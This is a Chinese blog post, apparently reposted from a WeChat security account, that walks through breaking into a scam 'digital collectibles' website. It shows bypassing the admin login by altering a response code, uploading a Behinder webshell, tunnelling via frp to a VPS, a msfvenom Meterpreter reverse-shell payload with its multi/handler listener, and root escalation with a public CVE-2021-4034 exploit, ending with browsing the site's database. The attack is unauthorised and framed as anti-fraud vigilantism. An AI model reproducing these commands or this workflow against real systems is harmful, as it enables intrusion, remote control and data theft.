实战杀猪盘渗透测试

admin

138646
文章

114
评论

2022年9月28日10:43:43评论110 views字数 1495阅读4分59秒阅读模式

作者：一点我爱你110，转载自FreeBuf.COM

这是一个主打数字藏品的网站元宇宙妥妥的割韭菜，关于这个网站也是无意间找到的。

实战杀猪盘渗透测试

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

实战杀猪盘渗透测试

先打一波poc没有效果，

实战杀猪盘渗透测试

访问一下后台直接在url后面加/admin。

实战杀猪盘渗透测试

一个开源的cms还没有验证码尝试用burp进行爆破，首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

实战杀猪盘渗透测试

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

实战杀猪盘渗透测试

在爆破之前先发送到Repeater模块发送看看反应。

实战杀猪盘渗透测试

用户不存在返回code为1的响应码，尝试拦截返回包把1改为0。

实战杀猪盘渗透测试

成功登录后台，这应该是个前端js验证非常的不安全。

实战杀猪盘渗透测试

尝试找上传点，点击用户管理-编辑-上传头像，上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。

成功上传链接冰蝎马。

实战杀猪盘渗透测试

想办法上线到msf提权，这里就使用frp内网穿透，在我的vps开启frp。

./frps -c frps.ini

实战杀猪盘渗透测试

在内网上的kali进行设置

设置配置文件将8000端口的流量转到kali的6666端口。

启动客户端

./frpc -c frpc.ini

实战杀猪盘渗透测试

生成msf木马ip和端口要填vps的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf

这里的lhost 应为服务器地址 LPORT 为反向代理端口，将shell.elf上传到/www/wwwroot/目录设置权限为777。

实战杀猪盘渗透测试

打开msf进行监听

use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 127.0.0.1set lport 6666exploit

运行shell.elf

./shell.elf

实战杀猪盘渗透测试

成功返回会话。

实战杀猪盘渗透测试

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

实战杀猪盘渗透测试

使用cve-2021-4034提权，切换到linux shell下面然后进到/tmp目录下下载脚本。

git clone https://github.com/berdav/CVE-2021-4034.git

实战杀猪盘渗透测试

似乎不行卡住了直接上传上去吧。

upload /home/kali/Desktop/CVE-2021-4034  /tmp/进入shellcd /tmpmakechmod 777 cve-2021-4034./cve-2021-4034

返回root权限。

实战杀猪盘渗透测试

查看database.php文件链接数据库发现基本上也没有人充值，看到一个账号40w的就是这家所谓数字藏品公司的老总。

实战杀猪盘渗透测试

登进入尝试提现均提示账户金额异常看来是跑路了，加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

实战杀猪盘渗透测试

加个好友进技术交流群

请备注：进群

实战杀猪盘渗透测试

推荐阅读

欢迎在看丨留言丨分享至朋友圈 三连

 好文推荐  

赠书|《内网渗透体系建设》
实战|记一次拿下网络诈骗者站点的全过程与套路分析
一个组合多位师傅的渗透测试字典 建议收藏

实战｜一次完整的博彩渗透测试

网警的牛X世界你不懂

实战|一次不太成功的反诈骗渗透测试

实战|文件上传绕过的一次思路总结学习（两个上传点组合Getshell）

AppScan10.0.8（附下载地址）

BurpSuite_pro_v2022.8（附下载地址）

一款强大的红队资产测绘工具

红队必备-防蜜罐抓到被打断腿

原文始发于微信公众号（乌雲安全）：实战杀猪盘渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

实战杀猪盘渗透测试

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

发表评论

在线咨询

微信